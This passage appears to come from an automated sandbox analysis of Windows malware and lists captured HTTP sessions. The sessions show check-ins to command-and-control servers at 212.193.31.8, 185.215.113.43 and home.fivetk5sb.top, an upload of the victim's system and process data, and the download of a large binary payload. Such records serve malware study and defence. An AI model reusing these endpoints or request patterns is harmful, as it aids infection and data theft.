                                                                                                                                                                                                                                                              Data Ascii: 'E3mG;J?-pEGW85(_EAZc{scVP98;I~%P81< k{NR5<4CO_pXx<{XpTr.jWu/"Po%#}?";&*Gn)KsSm4$q{'{"EIY"'"Fp|gU\;'
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:02.800632954 CET1236INData Raw: 17 5e 83 f1 c3 d4 5b 57 0f b0 02 fe 89 ba 60 c5 a8 5e d0 d7 3f ac 87 f5 46 fe fa 98 1d 2b 4a eb d4 e8 43 62 dd 13 83 57 fb e7 bb d7 af 4e 62 17 37 42 93 a5 56 26 b1 73 7d 1a b3 58 ce cd 26 d4 29 25 7b ac b5 bc 21 64 76 f2 52 ea d8 3f 98 64 cb 20
                                                                                                                                                                                                                                                              Data Ascii: ^[W`^?F+JCbWNb7BV&s}X&)%{!dvR?d G5fMUp7\{dnr3TqOFobd3^KNA'/W3p,#8h{|C<CMLs'tnN,\W7NSUws;;WZ[
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:02.800668955 CET1236INData Raw: 54 12 2c c5 d9 20 48 3f f5 51 f8 7b d4 85 fa 3d d7 7c bd 2e 9b 64 97 d2 42 07 86 15 57 94 8c e7 a2 0d e0 40 3b 77 cd e5 20 58 ef 01 58 ef a4 22 97 17 a6 39 96 84 9f 4c d9 e2 6f 54 5a 1d ae 49 f4 a1 01 f9 51 2f f6 90 36 1a 20 8d 40 9b 8b e3 4f 25
                                                                                                                                                                                                                                                              Data Ascii: T, H?Q{=|.dBW@;w XX"9LoTZIQ/6 @O%w]2YM\pL/8R3Ncna1I@BCgPS9@]KWQ9.qj"E'1SY"Iz]Ps 'rvR6-
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:02.919800997 CET1236INData Raw: 22 46 29 e9 72 eb 4a f4 9d 96 1c cc 8d fe a1 41 fb 88 38 34 31 27 ce f2 7a 6e f9 eb fa d3 68 c9 f6 ea 7b ca a6 9b 7e 2a cd a4 32 1b 72 d1 53 d1 b1 40 83 cf 80 a4 7f 8c da 2e e0 78 9a 83 0e 51 52 aa 6d f7 f2 32 14 d9 ef 7c ab c7 2b af 5a 1b e5 ef
                                                                                                                                                                                                                                                              Data Ascii: "F)rJA841'znh{~*2rS@.xQRm2|+Z_tUXx@`&5xh=HF6:\uENF%>3wTHWO78RO C~5I'6HUxwcRuh*}EUN[


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              21192.168.2.449919212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:03.295223951 CET160OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:04.581288099 CET155INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:04 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c>3<d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              22192.168.2.449925212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:06.508235931 CET312OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 72 3d 45 35 46 44 44 37 34 37 41 45 46 35 41 37 42 42 36 33 30 36 39 36 36 35 44 39 34 38 41 32 37 32 41 41 44 32 38 44 30 45 37 30 32 32 37 37 44 42 37 34 44 31 35 41 35 37 34 42 42 41 32 36 33 44 45 33 32 36 41 33 44 30 45 37 45 37 45 42 36 32 37 44 31 30 45 41 41 35 37 32 45 43 42 41 30 37 42 37 34 43 42 45 44 34 31 46 36 31 39 46 32 45 41 34 31 46 42 45 45 42 39 46 46 34 45 42 35 31 46 34 35 37 45 43 30 30 30 32 45 43 39 41 45 33 36 34 42 41 39 39 37 33
                                                                                                                                                                                                                                                              Data Ascii: r=E5FDD747AEF5A7BB63069665D948A272AAD28D0E702277DB74D15A574BBA263DE326A3D0E7E7EB627D10EAA572ECBA07B74CBED41F619F2EA41FBEEB9FF4EB51F457EC0002EC9AE364BA9973
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:07.846683025 CET154INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:07 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 7
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c><d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              23192.168.2.449930185.121.15.192802648C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:07.739700079 CET12360OUTPOST /niCGMfnfOxUBXxpLhBBB1734796753 HTTP/1.1
                                                                                                                                                                                                                                                              Host: home.fivetk5sb.top
                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                              Content-Length: 467287
                                                                                                                                                                                                                                                              Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 36 36 35 38 38 33 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458316658830", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:07.859337091 CET4944OUTData Raw: 64 59 57 56 70 6a 5a 47 56 6d 5a 32 68 70 61 6e 4e 30 64 58 5a 33 65 48 6c 36 67 6f 4f 45 68 59 61 48 69 49 6d 4b 6b 70 4f 55 6c 5a 61 58 6d 4a 6d 61 6f 71 4f 6b 70 61 61 6e 71 4b 6d 71 73 72 4f 30 74 62 61 33 75 4c 6d 36 77 73 50 45 78 63 62 48
                                                                                                                                                                                                                                                              Data Ascii: dYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6\/9oADAMBAAIRAxEAPwDh6Kc\/3j+H8hTa\/wCiT2nl+P8AwD\/lPCivXvCnwQ8e+KtE0\/xX9l0\/w74O1S4uraw8VeJr9NP029exne1vW0uwt477xHrsVnd
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:07.859438896 CET4944OUTData Raw: 4a 5c 2f 77 41 74 55 6b 5c 2f 66 77 66 57 36 5c 2f 4c 38 50 30 6f 62 5c 2f 41 46 6b 4c 5c 2f 77 43 75 50 5c 2f 4c 57 54 74 78 5c 2f 6e 39 61 66 47 45 6a 62 66 73 6b 52 4c 6a 39 36 52 5c 2f 71 50 2b 33 58 33 5c 2f 6e 37 39 71 5a 4a 6e 37 67 2b 54
                                                                                                                                                                                                                                                              Data Ascii: J\/wAtUk\/fwfW6\/L8P0ob\/AFkL\/wCuP\/LWTtx\/n9afGEjbfskRLj96R\/qP+3X3\/n79qZJn7g+T975X+kdf85\/ya6AGf8tJv4PLi\/5afv5\/8\/8A6vWiT93v\/fS\/u\/3sP+fy9vr0IBtZ\/wDWbPN\/dfuv8\/8A18A9af8A7E3yeZ\/rf3X78df85\/8Ar5AKbbpJXf8A6a+afXr\/AJ\/n60z5\/k3\/ACenm
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:07.859488010 CET4944OUTData Raw: 39 5c 2f 30 5c 2f 77 44 72 31 48 56 69 69 67 30 4b 39 52 79 64 76 78 71 35 56 65 67 43 76 52 56 69 6d 79 63 5c 2f 50 30 78 5c 2f 54 2b 6f 37 30 48 51 51 30 55 55 55 41 52 62 44 37 66 35 5c 2f 43 6d 56 59 71 76 57 6e 73 5c 2f 50 38 50 2b 43 64 41
                                                                                                                                                                                                                                                              Data Ascii: 9\/0\/wDr1HViig0K9Rydvxq5VegCvRVimyc\/P0x\/T+o70HQQ0UUUARbD7f5\/CmVYqvWns\/P8P+CdAVHJ2\/H+lSU1l3Uez8\/w\/wCCBDTdi+n8\/wDGnUUez8\/w\/wCCaU+vy\/UZsHv\/AJ\/Cq7Lu\/l9as7\/3iL\/n1\/8Ar\/8A6qho9n5\/h\/wTQi2H2\/z+FMqxUT9fw\/qaPZ+f4f8ABOgreV7L+X\/1qQr
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:07.859600067 CET4944OUTData Raw: 57 76 6f 76 39 6f 7a 56 72 4f 35 38 51 36 44 6f 31 74 66 32 56 34 2b 6d 61 64 64 33 4d 34 73 37 71 4b 36 57 47 58 55 4c 70 49 54 48 49 30 4c 4f 49 35 67 75 6e 49 7a 52 53 62 4a 56 56 6f 32 5a 51 72 6f 54 38 36 56 5c 2f 70 66 39 48 6e 42 55 63 4c
                                                                                                                                                                                                                                                              Data Ascii: Wvov9ozVrO58Q6Do1tf2V4+madd3M4s7qK6WGXULpITHI0LOI5gunIzRSbJVVo2ZQroT86V\/pf9HnBUcL4T8OYilKE\/7VnmWaTnTalGaxGY4mlQkpJvmvhKGGd91t0P8dfpV5jXxvjhxdha0alP+xYZPk0KdRSjOm8LlOErYmDg0uXlx+Jxats\/i3kxmwe\/+fwpj\/eP4fyFTUzu\/wBB\/Kv2w\/n0ioop+w+3+fwoA\/s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:07.859687090 CET2472OUTData Raw: 6e 37 6b 2b 64 48 66 35 4a 66 73 5c 2f 77 44 79 31 5c 2f 38 41 4a 72 2b 6e 57 6f 66 6e 58 66 73 54 79 5c 2f 33 66 2b 72 6a 5c 2f 41 4f 57 33 2b 6c 64 5c 2f 30 5c 2f 7a 7a 51 64 42 44 49 32 35 6b 52 4d 76 5c 2f 41 4d 66 47 50 35 66 35 37 5c 2f 6c
                                                                                                                                                                                                                                                              Data Ascii: n7k+dHf5Jfs\/wDy1\/8AJr+nWofnXfsTy\/3f+rj\/AOW3+ld\/0\/zzQdBDI25kRMv\/AMfGP5f57\/lyzzD9xE3\/ALr+n4\/6djtjuB9JlX5tgyj\/AOf9F+tEmWWZ\/wB3nyvK5\/6+v8npQdBWk5jZ9hTzOB\/Q\/hR8nybIdkf+kf8AP1\/T\/P5U\/wD5aOk\/yekef9b\/AJxUPmP\/ABJc\/wCt83\/W\/uP8\/St
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:07.859710932 CET2472OUTData Raw: 63 59 43 45 34 53 6e 43 30 55 70 52 62 5c 2f 6f 7a 47 65 50 76 30 71 63 77 34 46 63 73 52 78 39 78 31 5c 2f 71 6a 68 73 66 54 79 61 70 6e 4f 48 70 34 58 42 5a 6e 39 66 78 4f 47 78 47 4a 70 34 4c 45 38 54 59 50 42 59 66 69 69 76 4f 74 68 73 4c 69
                                                                                                                                                                                                                                                              Data Ascii: cYCE4SnC0UpRb\/ozGePv0qcw4FcsRx9x1\/qjhsfTyapnOHp4XBZn9fxOGxGJp4LE8TYPBYfiivOthsLiai+sZnUhOFGreTcWj0aSaCb5plRZcYJJLHjOBk5OB6ducc1CbW3f\/AFU+PZ8cf41r+EdD0fxbZeEJ5viv8HfA+rfEv456h+zh8KfCXj3VPila+JfiZ8YLHRfA+tReFfDs\/gr4QeO\/Bui\/2mvxF8Kabp2reP8A
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:07.978888988 CET2472OUTData Raw: 70 53 6e 54 6c 47 54 5c 2f 6a 48 69 44 68 37 4f 2b 46 73 30 72 5a 4e 78 44 6c 39 66 4b 38 31 6f 55 38 4e 57 72 34 4c 45 75 6d 36 39 47 47 4d 77 39 50 46 55 50 61 71 6e 4f 6f 71 64 53 64 43 74 54 6e 4b 6c 4e 71 72 53 63 75 53 72 43 46 53 4d 6f 49
                                                                                                                                                                                                                                                              Data Ascii: pSnTlGT\/jHiDh7O+Fs0rZNxDl9fK81oU8NWr4LEum69GGMw9PFUPaqnOoqdSdCtTnKlNqrScuSrCFSMoIpr\/dP4fzFQXt1HY2d3ezcQ2dtPdSnOP3dvE8r8ngfKh5PSmvJMvxA0f4af2l4QHiPXfgMP2i7KaTXtWTSIPAJ+Al9+0aLfUbpfC8l7b+IR8P9PmhezttNvdMXXnhtF1h9NZ9Xj83iTjPhbhCkq\/E2d4HJaMsJmW
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:07.978990078 CET2472OUTData Raw: 72 59 33 70 5c 2f 4c 5c 2f 47 6a 59 33 70 5c 2f 4c 5c 2f 47 67 76 6e 66 6c 5c 2f 58 7a 4b 47 48 39 5c 2f 7a 5c 2f 77 44 72 30 76 6c 2b 5c 2f 77 43 6e 5c 2f 77 42 65 72 45 69 76 32 48 30 5c 2f 78 39 5c 2f 62 72 5c 2f 4f 6f 36 44 55 72 30 56 4b 5c
                                                                                                                                                                                                                                                              Data Ascii: rY3p\/L\/GjY3p\/L\/Ggvnfl\/XzKGH9\/z\/wDr0vl+\/wCn\/wBerEiv2H0\/x9\/br\/Oo6DUr0VK\/T8f6Gmcoe3I\/z6UGntPL8f8AgED9fwplWKi2H2\/z+FB2FSmP0\/H+hqfyn9P0P+FM2P7fl\/8AZUGlPr\/X9f8ADFaipX6fj\/Q1FQaET9fw\/qaZUknb8f6VHQae08vx\/wCARydvx\/pUdWKg2P7fl\/8AZU
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:07.979020119 CET2472OUTData Raw: 75 6e 70 61 5c 2f 35 39 71 47 62 39 35 5c 2f 64 5c 2f 77 43 32 52 38 2b 62 74 37 5c 2f 51 2b 76 34 55 62 6e 61 4a 30 52 4e 38 6e 5c 2f 4c 58 5c 2f 72 33 39 5c 2f 77 44 50 65 74 50 5a 2b 66 34 66 38 45 32 39 5c 2f 77 44 75 5c 2f 69 48 6c 79 48 72
                                                                                                                                                                                                                                                              Data Ascii: unpa\/59qGb95\/d\/wC2R8+bt7\/Q+v4UbnaJ0RN8n\/LX\/r39\/wDPetPZ+f4f8E29\/wDu\/iHlyHr9\/wD56fh\/y946c1D5nyvvfe\/\/ACxkcf6n\/J70EorN5Pl\/9c5P+Ww+v86nxIv9+FP9aI\/N8\/8A0f8ApVe\/\/d\/Eogk\/ec\/8th9ol\/54f8vX4df5fiKZ5eWfyfk\/35fXn\/P+FTfJ5iMnyfu\/+Wn
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:07.979105949 CET2472OUTData Raw: 34 71 4e 4b 6c 69 4a 72 48 56 63 54 58 72 30 48 68 5a 79 78 45 66 62 51 55 4a 34 72 4d 6e 6a 5c 2f 4d 66 42 48 78 50 38 4d 66 44 7a 77 6c 38 4d 50 43 5c 2f 69 6a 34 77 66 41 33 77 44 5c 2f 77 67 58 37 63 48 78 41 2b 4e 76 78 66 38 46 5c 2f 45 58
                                                                                                                                                                                                                                                              Data Ascii: 4qNKliJrHVcTXr0HhZyxEfbQUJ4rMnj\/MfBHxP8MfDzwl8MPC\/ij4wfA3wD\/wgX7cHxA+Nvxf8F\/EX9nHxz8V\/jR49+BHib4Q\/AXwdd6d+yl8YfC\/7Pvjy8+BXxo8RSeCPHfhzRfG\/hH9oL9mHxboOsS+G\/EM3xM0W1sNO1jTflb4Ofta3PwY+BPh\/wr8CvGPjn4UfFLwv\/wAE3v2nPgp8MbN\/DHjSbxH4D+MPj
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:11.385946035 CET183INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:11 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              Content-Length: 26
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Data Raw: 73 71 63 69 6d 31 6e 44 41 61 79 31 74 73 32 7a 31 37 33 34 38 33 30 32 32 39
                                                                                                                                                                                                                                                              Data Ascii: sqcim1nDAay1ts2z1734830229


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              24192.168.2.449935212.193.31.8805172C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:09.679073095 CET160OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 212.193.31.8
                                                                                                                                                                                                                                                              Content-Length: 4
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                              Data Ascii: st=s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:10.964806080 CET155INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:10 GMT
                                                                                                                                                                                                                                                              Server: Apache/2.4.58 (Ubuntu)
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                                                                                                              Data Ascii: <c>3<d>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              25192.168.2.449942185.215.113.43802472C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:12.493330956 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Host: 185.215.113.43
                                                                                                                                                                                                                                                              Content-Length: 31
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Data Raw: 64 31 3d 31 30 31 39 38 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                              Data Ascii: d1=1019806001&unit=246122658369
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:13.856846094 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:13 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              26192.168.2.449944185.121.15.192802648C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:12.544564009 CET123OUTGET /niCGMfnfOxUBXxpLhBBB1734796753?argument=sqcim1nDAay1ts2z1734830229 HTTP/1.1
                                                                                                                                                                                                                                                              Host: home.fivetk5sb.top
                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:14.116962910 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx/1.22.1
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:17:13 GMT
                                                                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                                                                              Content-Length: 10816560
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="6434GUfXCQCleVKhynOXG;"
                                                                                                                                                                                                                                                              Last-Modified: Sat, 21 Dec 2024 15:59:13 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              ETag: "1734796753.6408284-10816560-3826063559"
                                                                                                                                                                                                                                                              Data Raw: b1 e5 ff 77 ff d9 b6 70 b5 41 7b 0f 61 45 db 3e e5 b3 af e7 0a 4f 90 f9 e0 e9 39 f2 66 4a 90 57 2a c8 18 01 6b 3d 71 4f 32 cf e0 c2 8e 2a 34 67 01 1e cc 58 e5 9b 71 ae f8 39 37 ed 6d b0 d5 cc a3 31 18 c5 36 b2 9a 4d 79 76 d3 a0 8e 4f 64 71 6a 71 86 ec 4a ec c7 de 1d f9 7a bf 26 bd 39 37 4b b2 cd 72 8b df 49 46 b3 82 5a 08 c3 9c d1 2c 67 b6 fd 62 fc ca 63 9b 29 71 28 a0 2c 12 76 61 f1 b6 b2 07 e3 7a 34 6c 89 2e 6e 58 de 02 6e b6 6f fa 81 dd d6 c1 94 0f 10 a1 d1 92 e0 94 07 fd fe 08 de 2b 01 29 a7 78 98 d1 50 2b 13 37 bc 7d b3 91 0d 51 d7 50 19 3f 45 0f a2 80 8b 8b f2 7f 4f a5 11 73 33 0e 09 31 f0 06 4e 60 33 90 c1 0f 78 19 07 66 0d f7 1b 0a 55 f2 3a a7 1d 04 9e 87 6e 14 2b f2 b9 47 33 17 4c 96 ea 93 90 95 e4 1c 35 9a 0a ae f1 d5 af 96 99 76 92 37 96 ba 96 29 e7 2b d9 66 b2 14 15 40 93 f4 1c 9a fc 71 20 ec 0d 5e 1e ba 2b fb c0 87 ff 87 19 c2 84 84 ba aa ae 63 25 4b 99 1d 8a 7f b3 5d bf 4b 25 b2 f7 f1 ea 23 60 44 7f cc 49 f1 cc ea 48 c1 02 11 63 76 cd f8 2c 20 c9 85 05 5e 0a d7 4d 38 54 0d e8 dd 2b dd [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: wpA{aE>O9fJW*k=qO2*4gXq97m16MyvOdqjqJz&97KrIFZ,gbc)q(,vaz4l.nXno+)xP+7}QP?EOs31N`3xfU:n+G3L5v7)+f@q ^+c%K]K%#`DIHcv, ^M8T+jF-^z;hm\Z}HP/2T2:ySZ,Bjg-RPYgw5f>>Et?:aKgMVF%vXQ ovFrgAjK''}TQ^gLR+=@Kp~FL`atjnT4{[NLoFUhvh7z0L]w5kAdqZ~D7=i9_Gjgevym{9'% '\Ph{l'@'Hx7`@aa(Vx~U`!mol$|uJU;a1<{rc`:^wvY8#X2<{K{Zw|vm[vI8{9M{=v^El&amya`p5;4
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:14.117147923 CET1236INData Raw: 4b b7 48 75 f9 49 ea e6 b2 94 9d 73 20 f9 01 78 02 62 73 6d cd a2 b0 ab 60 b7 6c 6a 5e 85 58 4b 8f 12 88 1b 6d e5 56 62 e8 9a b4 fb c5 08 71 03 e8 06 c5 13 11 09 6e ab c7 07 3f 21 43 ed f2 81 4f 75 b0 c3 da bd 1d 09 a9 b4 f9 de b7 bb 2f f8 b2 0d
                                                                                                                                                                                                                                                              Data Ascii: KHuIs xbsm`lj^XKmVbqn?!COu/m:T8Ll?K-]RnoSI%e`0mcA.9K@=&O!vUmv5x2qC9H"/&[xeWM#iH4Ml.oCRa1g{pd9s
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:14.117186069 CET1236INData Raw: 04 2c b8 c8 c7 2e a7 d3 4b 3f 9f 4b ee 87 b3 5c ab 81 d9 99 18 57 83 89 85 28 80 f9 2c bc 62 98 40 3e 8c c4 ae ec 83 dc 78 3d 04 f2 29 c1 15 30 31 c2 6f 9f e1 fb 77 62 83 47 bc ba d1 68 80 6c ae b5 d0 97 23 93 da 47 2d 25 98 22 0d b8 bb a9 d6 e3
                                                                                                                                                                                                                                                              Data Ascii: ,.K?K\W(,b@>x=)01owbGhl#G-%";X>l8x`QnHeipT}-7 0sKUIPi=;V&&"e_dSKi2dv>rc$BMKm(9]23<W<MfK+jM2nM
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:14.117314100 CET1236INData Raw: 36 7d 32 9a a7 21 c0 43 ef fb c0 f3 77 bd 8a 32 4c ab bc 9f 9d d6 d6 01 0e bb ff 3a f5 63 4a 94 8a 91 42 d6 5d 1f 7a f7 5c 65 4e 0f 92 6b e0 fd 16 64 2c ea bb 42 4a 99 1a 22 75 d9 15 14 49 a0 76 6b 55 c1 eb 5c a9 9d 7a 23 e0 28 fc 2e 38 8a 1f 39
                                                                                                                                                                                                                                                              Data Ascii: 6}2!Cw2L:cJB]z\eNkd,BJ"uIvkU\z#(.89:`s%%$^*/bwY=ldD_3ra&L!Q,bU"s\;aqAD$cJ/k/[x\T/,#g#V;Vcnag%Vl=%/oLp48Fp-G19~{f
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:14.117486000 CET1236INData Raw: 54 cb 99 4e 78 5d 2d aa 22 04 6f b2 72 79 b3 52 10 82 c5 9d 8c 82 d6 8c 26 76 44 24 9e 1d 29 50 23 c5 a5 dc 77 92 b7 b4 91 c8 fd 3c fb 7a fc ba b4 54 0f 90 05 13 81 fe 77 7c 51 18 2f 89 a6 4d 51 c7 8c aa c2 c2 98 96 89 9d ec e7 1e d5 e7 fa a7 d7
                                                                                                                                                                                                                                                              Data Ascii: TNx]-"oryR&vD$)P#w<zTw|Q/MQ*jdZ=[sNGU0$>-he7}@h6Z$JUboJxZmep|^'>GM(\6zk@e'61ip,$R6!hU#9:L0p
                                                                                                                                                                                                                                                              Dec 22, 2024 02:17:14.117522955 CET1120INData Raw: 64 fc c5 9e 3a eb d0 91 bc a8 2c 1a f1 35 3f fc d0 3c 43 05 c5 6c 44 c6 42 a3 02 67 38 3a 1c af 8b c8 25 2a 55 e2 01 91 9a f6 d1 85 63 78 21 1f 6e cb 85 d9 57 dd cd ea 60 71 91 6f c5 5d 85 72 88 de fd ae 4b 8e 67 51 1c 1e 8d f9 4d 22 37 1f c7 d6
